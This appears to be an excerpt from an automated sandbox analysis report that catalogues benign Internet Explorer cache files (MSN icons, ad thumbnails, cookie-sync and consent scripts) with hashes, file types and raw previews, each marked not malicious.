SHA-256:	7DE0FB95FE9F84CFA3F6AD5C244EE32D5BCAC0D391326EBC57B6F97FB45B5B61
SHA-512:	C41EC5B03EA2FF6C6565DCF05CCEA387689C86D971663F24ACD96C5979D2911C86E7216EDE11832509031D1D507734C540DF0E8092D94BBF0330210B4ACF3F70
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMW3y8.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.RAK.Q.=..D..A....Ed.E.B7..A.MV...W./....j'......F!B.H...E.3.z.......x.....~.{...V.L....N.}q.\.;.n...`JS:.......Oga>.. ..Td>....Z"M%../@{..0\|..........`.d##.....9.Z..........v9...v&Vt..z...J.&..e.....^_.Z{.r.a....:^yvE.o..Y..,..=B.?..a.Q_^.&.&_........'..&Nx.x...nD...j.Z...I+.P]:......#.t.d.)..f..l..': .W#.gg...'.p...i.f(&i.(j9P....a..../$.V..d?....\|.[...Q:-w...QH..C&t..?y[..~S..o.k+.RWtH-7.l.k;.K....w../.Ka...............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBXXVfm[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	823
Entropy (8bit):	7.627857860653524
Encrypted:	false
SSDEEP:	24:U/6IPdppmpWEL+O4TCagyP79AyECQdYTVc6ozvqE435/kc:U/6Ilpa4T/0IVKdI1
MD5:	C457956A3F2070F422DD1CC883FB4DFB
SHA1:	67658594284D733BB3EE7951FE3D6EE6EB39C8E2
SHA-256:	90E75C3A88CD566D8C3A39169B1370BBE5509BCBF8270AF73DB9F373C145C897
SHA-512:	FE9D1C3F20291DFB59B0CEF343453E288394C63EF1BE4FF2E12F3F9F2C871452677B8346604E3C15A241F11CC7FEB0B91A2F3C9A2A67E446A5B4A37D331BCEA3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBXXVfm.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.SKH.a....g.....E..j..B7..B..... .L)q.&t..\EA. A.. D.. 7..M.(#A.t\|&..z.3w.....Zu.;s.9.;................i.o.P.:....D.+...!.....4.g.J..W..F.mC..%tt0I.j..J..kU.o...0.....qk4....!>.>...;...Q..".5$..oaX..>..:..Ebl..;.{s...W.v..#k}].)}......U.'....R..(..4..n..dp......v.@!..^G0....A..j.}..h+..t.....<..q...6.8.jG......E%...F.......ZT....+....-.R.....M.. .A.wM........+.F}.....`-+u....yf..h,.KB.0......;I.'..E.(...2VR;.V...u...cM..}....r\.!.J>%......8f"....q.\|...i..8..I1..f.3p.@ $a.k.A...3..I.O.Dj...}..PY.5`...$..y.Z..t... ...\|.E.zp............>f..<z.If...9Z;....O.^B.Q..-.C....=.......v?@).Q..b...3....`.9d.D5.......X.....Za.......!#h.. \&s....M3Qa..%.p..\1..xE.>..-J.._........?..?5e......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBY7ARN[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	778
Entropy (8bit):	7.591554400063189
Encrypted:	false
SSDEEP:	12:6v/78/W/6TiO53VscuiflpvROsc13pPaOSuTJ8nKB8P9FekVA7WMZQ4CbAyvK0A:U/6WO5Fs2dBRGQOdl8Y8PHVA7DQ4CbX0
MD5:	7AEA772CD72970BB1C6EBCED8F2B3431
SHA1:	CB677B46C48684596953100348C24FFEF8DC4416
SHA-256:	FA59A5A8327DB116241771AFCD106B8B301B10DBBCB8F636003B121D7500DF32
SHA-512:	E245EF217FA451774B6071562C202CA2D4ACF7FC176C83A76CCA0A5860416C5AA31B1093528BF55E87DE6B5C03C5C2C9518AB6BF5AA171EC658EC74818E8AB2E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBY7ARN.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8OMS[k.Q..v.....)&V."./(H. U..\|P,.....DP.}...bA.A\|.....J..k.5Mj..ic...^.3.Mq..33;.\......EK8.".2x.2.m;.}."..V...o..W7.\.5P...p.........2..+p..@4.-...R..{....3..#.-.. .E.Y....Z..L ..>z...[.F...h.........df_...-....8..s~.N...\|...,..Ux.5.FO#...E4.#.#.B.@..G.A.R._. .."g.s1.._@.u.zaC.F.n?.w.,6.R%N=a....B:.Z.UB...>r..}.....a.....\4.3.../a.Q.......k<..o.HN.At.(../)......D...u...7o.8\|....b.g..~3...Y8sy.1IlJ..d.o.0R]..8...y,\...+.V...:?B}.#g&.`G.........2.......#X.y).$..'.Z.t.7O.....g.J.2..`..soF...+....C.............z.....$.O:./...../].]..f.hW.....P....H.7..Qv...rat....+.(..s.n..w...S...S...G.%v.Q.aX.h.4....o.~.nL.lZ..6.=...@..?.f.H...[..I)..["w..r.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301493036290279
Encrypted:	false
SSDEEP:	384:RpAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:386qhbz2RmF3OssQWwY4RXrqt
MD5:	72C1F1F3F129C727E7B71E4873CC2B9F
SHA1:	18352C21C278361D11A7C9536A0B65CE08DE44CC
SHA-256:	C9B5A016306FD45301DC8F69359D1B1C983F6661F22990A72EF15026FC334BBF
SHA-512:	B58D34ACDFA63F54E3C47C76B2E9A3F7789FB07087846A15535BBD9472FC44D74576005783DFA50057D320D351D2B82BD05DF8126D9444EB06F37D10E6822A0D
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301493036290279
Encrypted:	false
SSDEEP:	384:RpAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:386qhbz2RmF3OssQWwY4RXrqt
MD5:	72C1F1F3F129C727E7B71E4873CC2B9F
SHA1:	18352C21C278361D11A7C9536A0B65CE08DE44CC
SHA-256:	C9B5A016306FD45301DC8F69359D1B1C983F6661F22990A72EF15026FC334BBF
SHA-512:	B58D34ACDFA63F54E3C47C76B2E9A3F7789FB07087846A15535BBD9472FC44D74576005783DFA50057D320D351D2B82BD05DF8126D9444EB06F37D10E6822A0D
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	76785
Entropy (8bit):	5.343242780960818
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCFPQtihPxVUYUEJ0YAtF:olLEJxa4CmdiuWloIti1wYm7B
MD5:	DBACAF93F0795EB6276D58CC311C1E8F
SHA1:	4667F15EAB575E663D1E70C0D14FE2163A84981D
SHA-256:	51D30486C1FE33A38A654C31EDB529A36338FBDFA53D9F238DCCB24FF42F75AF
SHA-512:	CFC1986EF5C82A9EA3DCD22460351DA10CF17BA6CDC1EE8014AAA8E2A255C66BB840B0A5CC91E0EB42E6FE50EC0E2514A679EA960C827D7C8C9F891E55908387
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_3e4db03aeb27326fa409d0201601c66d[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	10928
Entropy (8bit):	7.956030588292682
Encrypted:	false
SSDEEP:	192:L6zlqp97Pzn186KnXg5acKZ4KdQiTD/DetwAIM/6c+8MefqXlS5UiG:OJeZzJ+y4QiTD/DeH/63GiV6+
MD5:	0C1A16B7BE63A652982673F6557DC826
SHA1:	57270462703461486071ABBA8C09E0A4D763AC81
SHA-256:	708CCCB9C1594400AC6F3AD998B498A9EEDCC50A8A6194EA633C9DC6D656B139
SHA-512:	2D0937F8E4547A895BAFACF1644CC7F465F5D081BF4B600ABDC8C7A275E69B335A0A4C5452DFFBE1CB1A8F6C62FFEB2D1CFF672755764F3B3274A0140E47842F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F3e4db03aeb27326fa409d0201601c66d.jpg
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C.......)..)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......7.....................................................................................oCk..9\..`. v..../D.Hs5 .4..Vu=@..1..g.A.....Y.....HV5cN....jy..k..........b.@..8...K........N..&...\.N:..WT.0..I..q8z.4...&fP...5\|..p.51J...).....(>.Q.\...e....(.L..k...v.Q..5...F.jL..A.....z.@u.....[+....AhG......c.......VR.&a.x\..d......}...:......4.2.A..3N;B.Z1...\.T....8..^....v.]...R.o.;.1....}..7VE....2.....V.&;P...9.R]>....UY.zn6...Ej........(Md....JBMX........T...>.%.^.1.af.w..Y.M.ft........a....Rc..9..jj.N~....Nl..BW;f.......O...g-..PY.f...6...@..k..\|.u....E.N.>.m\.1..@...C.(-r..D.".C..f....y.*Y..K.S=-3.. @.......:.....xsb.Z.;.^.3{..<.<...Y\...........4.. .BZ.d.....}W..yG..~..`o.w.\.$.. @.....VcQ...A@.Z....Kx.;9#k.5..G.1...... @.`.>Z..OK.i#..'..O....i...w........... .8.....A.....?...f...,Zg.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_83391a7002b8c5f42ca4f88e9ece32cd[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	13809
Entropy (8bit):	7.9623522043353985
Encrypted:	false
SSDEEP:	384:/81dI9o9ZW/wXcfDASJ0AwRZzkzHIspawrKr:/8XIa9ZW/KcfRuzet3rKr
MD5:	8D136764B083D24E833091E9A6FB4B25
SHA1:	3F869D328253FCEF14CA0FE85A9953241332312E
SHA-256:	2F1D26B48C4BE53C8C52C44E2984CFB9290A9BAB058B6B8280190D036D6EF2A8
SHA-512:	C88C0918BFAEBA5E92185AB12AD4ADCA4F8D085E85FC3F4FBD06FAB54B492E5CBC393947DFCF230D51E595E604248F26EB0B25FDE30624A39648BA7B9E40C87A
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_505%2Cy_331/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F83391a7002b8c5f42ca4f88e9ece32cd.png
Preview:	......JFIF..........................................."......".$...$.6&&6>424>LDDL_Z_\|\|.............................."......".$...$.6&&6>424>LDDL_Z_\|\|.......7...."..........4.................................................................9X.J.-Ug{...k...l6$...]I....WL.I0.`"...7..2...I.<..7.\|..:.n;..O..v.nE-/\.s.c6.}......i.a..6.... 1.1Y.....1VC...>=[M.L ,.KBt...Ga..31R.s..^./-...V.....(g.*.{.P..o.C`..l.;....fo...B....).\|.h...E...r\|W5).'...H.....n.+E.....Q..}K...l.[.}.M......^C..J...^I.H....LtyF%(.x.Q'z.I,q.aH./.uG..d...i......c.-.\.cZ.e.hF@....9.S6.(.]..VKOG..pl.P....H.U.<..B.....\O]....h.j..MK?X.l..3.\J..t.7.5.g%...W7..rB.l..........>J.e.....g.\..K.B...&..h.C2.o.OM%.v.Y..\.[m\...e$rd(.G...5e.6.8H..9...+y:...../.y.....[1.m.an..XZ.cG......./, .Uj.>.:n.V.Db.$.....]......9...Hl....d....j+V..4...rcAt.#.\|...c.c.u..R...i...YA.s}z..@..v.c.d_A.l2..c.`.90X.5..m......RJ!..$.../..5P...%qv[....Vlqz.lO.FU}...Z.b .?.....Q..Gu8rEB......%....]j.(....b-

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_c9bcf046afcb71d03b8592e0c5e08bf3[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	19799
Entropy (8bit):	7.892935280079615
Encrypted:	false
SSDEEP:	384:BYNg71VsZZdOcYXJuF5gfaneDgYhm6EolWJmQmPM4WgU/o:BYybC+Rs8gmR3+m3WgCo
MD5:	24ADB3DCDE1B6475C02CA0BAD89F1CE5
SHA1:	C46BF3210E4A1110C10F5EC7287357768F71D7C3
SHA-256:	1B9466241838B4C1371468088F92D4F852CE45D8769EA11FB1B2C829917EC9F1
SHA-512:	9C0E37D9D769453D7577E8605FB42C98A4F6CBDEA65CC72E684955451F989D5F2090048C01C3F5536D275A504D00F9F8F03229D8E0EAAB59AF04717B76A71BB7
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc9bcf046afcb71d03b8592e0c5e08bf3.jpg
Preview:	......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1851-CH_nulltarif_calculation_hg_bubble_1200x800_1000x600_bd539020df8cb8e09d440cb063f92083[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	14247
Entropy (8bit):	7.96961752870235
Encrypted:	false
SSDEEP:	384:zcjZ3D9OXtVouBy0I8xED7CKxH/9oTEcqeZPSSbrmZ5/c:zcBQLoD/D7Vx1aEFe1SSP
MD5:	16402766409090AA58F098A8B3E2D9CA
SHA1:	B159E7B8E739CC892A84BFF32ED6EBEA85B87467
SHA-256:	5BB5A85235E25C4CBEE760AD4C35CC7047FA212754F354ABB01949C9DC7DFBCA
SHA-512:	AE941157440BC19A51D91CB2A73E3C926EDB80C753E1AFC043D0B665B1F995801385F8816044994718578078660F420F3DAD4F3F99884B423B7F7EBC4D68AAC2
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2FTB1851-CH_nulltarif_calculation_hg_bubble_1200x800_1000x600_bd539020df8cb8e09d440cb063f92083.png
Preview:	......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........5..................................................................0N./n...t.0:Qt...L....jt...(a.:...^....3P..K.2.q4Y.Z.,..(...... .....g.R......&.8D.p........%...........,d..(..EKj....Q+.w....8........Y.Is.).N..r.........T&.jL.M..j.e%t..W...].Tc...k......o.$.&....w..y.s.q..3...W...W7lh..V....Z)St.....YwAF....=F.7..?....O?....iO..Z...2.kY^.${.t..^......"%+.~y.k..H...>.Z.N.vN<..u%...g9.....wy+n... ..X..OK...7..I...v......\.i-...^.(..u..k.B.).FR...wwOC.&.qk...X...z..g..;.....\|"^vW.M:s......u..m6#T..z..&i...v{b.G.U...iX@...vGe..V......p..a.2.....;..a.uJ...f.~.W.fc....\|...f].A.....jd.jPX6..d...M.'..0...u..h.54r......'Ln..My........+b].VL]....z........=J....ZV..Z.R.j....U..sd..n../....IN.t..4.rf`.....3..q....>F.E..d.....W:.f.PX...V..B'.h.'.jy!./_. .^.7...x...{......P.8...z..O....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\location[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	182
Entropy (8bit):	4.685293041881485
Encrypted:	false
SSDEEP:	3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
MD5:	C4F67A4EFC37372559CD375AA74454A3
SHA1:	2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
SHA-256:	C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
SHA-512:	1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
Malicious:	false
IE Cache URL:	https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Preview:	jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\41-0bee62-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1238
Entropy (8bit):	5.066474690445609
Encrypted:	false
SSDEEP:	24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
MD5:	7ADA9104CCDE3FDFB92233C8D389C582
SHA1:	4E5BA29703A7329EC3B63192DE30451272348E0D
SHA-256:	F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
SHA-512:	2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
Malicious:	false
Preview:	define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin\|\|(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\55a804ab-e5c6-4b97-9319-86263d365d28[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2889
Entropy (8bit):	4.775421414976267
Encrypted:	false
SSDEEP:	48:Y9vlgmDHF6Bjb40UMRBrvdiZv5Gh8aZa6AyYAcHHPk5JKIcF2rZjSInZjfumjVZf:OymDwb40zrvdip5GHZa6AymsJjbjVjFB
MD5:	1B9097304D51E69C8FF1CE714544A33B
SHA1:	3D514A68D6949659FA28975B9A65C5F7DA2137C3
SHA-256:	9B691ECE6BABE8B1C3DE01AEB838A428091089F93D38BDD80E224B8C06B88438
SHA-512:	C4EE34BBF3BF66382C84729E1B491BF9990C59F6FF29B958BD9F47C25C91F12B3D1977483CD42B9BD2A31F588E251812E56CBCD3AEE166DDF5AD99A27B4DF02C
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/55a804ab-e5c6-4b97-9319-86263d365d28.json
